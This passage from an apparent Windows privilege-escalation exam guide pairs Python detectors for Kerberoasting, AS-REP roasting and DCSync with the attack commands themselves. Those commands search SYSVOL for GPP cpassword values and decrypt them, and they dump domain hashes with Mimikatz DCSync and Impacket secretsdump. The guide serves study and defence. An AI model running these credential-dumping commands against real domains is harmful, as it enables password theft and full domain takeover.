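            (datetime.fromisoformat(e["TimeCreated"]), svc))
    alerts = []
    for (user, ip), reqs in per_requester.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):          # sliding window from each request
            spns = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(spns) >= threshold:
                alerts.append({"rule": "kerberoast", "user": user, "ip": ip,
                               "start": t0.isoformat(), "services": sorted(spns)})
                break
    return alerts


def detect_asrep_roast(events):
    """Every successful 4768 with PreAuthType 0 (no pre-authentication) and an
    RC4 ticket is worth an alert on its own: it hands out an offline-crackable
    blob, and real clients almost always pre-authenticate."""
    return [{"rule": "asrep-roast", "user": e["TargetUserName"], "ip": e["IpAddress"]}
            for e in events
            if e["EventID"] == 4768 and e.get("PreAuthType") == "0"
            and e["TicketEncryptionType"] == RC4 and e["Status"] == "0x0"]
```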
Group Policy Preferences
How it works: Pre-2014, Group Policy Preferences stored passwords in SYSVOL (readable by all domain users). Microsoft published the AES key, so any GPP password can be instantly decrypted.
# Find Groups.xml
findstr /S /I cpassword \\<domain>\sysvol\<domain>\policies\*.xml
# Searches SYSVOL for XML files containing "cpassword"
# cpassword is the GPP encrypted password field.
# /S: recursive, /I: case-insensitive
# Decrypt with gpp-decrypt
gpp-decrypt <cpassword_value>
# Tool that decrypts GPP passwords using Microsoft's published key.
# Instant decryption - no cracking needed!
# PowerSploit
Get-GPPPassword
# PowerShell function that automates the entire process.
# Finds and decrypts all GPP passwords in SYSVOL.
EXAM TIP: MS14-025 patched creation but old files may still exist.
MITRE ATT&CK: T1552.006
DCSync
How it works: Users with “Replicating Directory Changes All” rights can impersonate a domain controller and request password data via replication. Usually Domain/Enterprise Admins or accounts with delegated rights.
# Mimikatz
lsadump::dcsync /domain:domain.local /user:Administrator
# Requests replication data for specified user.
# Returns NTLM hash - can be used for pass-the-hash.
# /domain: target domain, /user: account to dump
# Impacket
secretsdump.py domain/user:password@DC_IP
# Python alternative for DCSync.
# Dumps all domain hashes if you have sufficient rights.
# Can also dump LSA secrets and cached credentials.
# Required rights:
# - Replicating Directory Changes
# - Replicating Directory Changes All
# Check with: Get-DomainObjectACL -ResolveGUIDs | ? { $_.ObjectAceType -like "*Replicating*" }
# (-ResolveGUIDs turns the right GUIDs into names so the -like filter can match)
MITRE ATT&CK: T1003.006
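Detection for DCSync, added here and not from this guide: the replication rights listed above are control-access rights that the DC audits in event 4662, so the rule flags any principal outside an assumed allowlist of replicators that exercises them. The GUIDs are the well-known schema values; sample events and account names are constructed.

```python
"""Detection for DCSync over event 4662 records. A replication request is
audited on the DC as 4662 with the control-access GUIDs of the
DS-Replication-Get-Changes rights in the Properties field. Legitimate
replication comes from DC machine accounts (and a sanctioned sync account,
if any), so any other principal exercising those rights is the signal."""
import re

# Rights GUIDs from the AD schema (well known; they are not page-specific).
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Principals expected to replicate: DC computer accounts plus any sanctioned
# directory-sync service account (assumed names, adjust per environment). An
# allowlist beats "ignore every name$": a workstation account that was granted
# the rights would otherwise slip through.
EXPECTED_REPLICATORS = {"DC01$", "DC02$", "MSOL_sync"}

_GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)
CONTROL_ACCESS = "0x100"   # AccessMask for extended rights such as replication
DOMAIN_DNS_CLASS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"   # domainDNS schema class


def _ev(user, props, mask=CONTROL_ACCESS):
    """Build a record with the 4662 field names (constructed sample data)."""
    return {"SubjectUserName": user, "SubjectDomainName": "CORP", "AccessMask": mask,
            "ObjectName": "%{constructed-domain-object-guid}",
            "Properties": "Control Access\n\t" + "\n\t".join("{%s}" % g for g in props)}


EVENTS_4662 = [
    _ev("DC02$", ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
                  "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2", DOMAIN_DNS_CLASS]),
    _ev("backup_admin", ["1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
                         "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2", DOMAIN_DNS_CLASS]),
    _ev("jdoe", [DOMAIN_DNS_CLASS]),                          # unrelated control access
    _ev("MSOL_sync", ["1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]),
    _ev("WS07$", ["1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"]),   # rogue machine account
]


def detect_dcsync(events, expected=EXPECTED_REPLICATORS):
    """Alert on every 4662 whose Properties list a replication right and whose
    subject is not an expected replicator; the alert names the rights used."""
    alerts = []
    for e in events:
        if e.get("AccessMask") != CONTROL_ACCESS:
            continue
        rights = [REPL_GUIDS[g.lower()] for g in _GUID_RE.findall(e["Properties"])
                  if g.lower() in REPL_GUIDS]
        if not rights or e["SubjectUserName"] in expected:
            continue
        alerts.append({"rule": "dcsync",
                       "user": f'{e["SubjectDomainName"]}\\{e["SubjectUserName"]}',
                       "rights": rights, "object": e["ObjectName"]})
    return alerts
```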
10. Essential Tools
Enumeration Tools
- PowerUp (PowerSploit) - PowerShell privesc checks
- winPEAS - Comprehensive enumeration script
- Seatbelt - Security-focused C# enumeration
- SharpUp - C# port of PowerUp
- Windows Exploit Suggester - Matches systeminfo to exploits
Exploitation Tools
- Mimikatz - Credential extraction swiss army knife
- Rubeus - Kerberos abuse toolkit
- Impacket - Python network protocol library
- PrintSpoofer - Potato-style exploit for modern Windows
- GodPotato - Latest Potato variant
High-Priority Topics for Exams
- Unquoted Service Paths
- Weak Service Permissions
- AlwaysInstallElevated
- Token Impersonation (Potato)
- Credential Files (PS History)
- Kerberoasting
- GPP Passwords
- PowerUp Invoke-AllChecks
Related: Linux Privilege Escalation Guide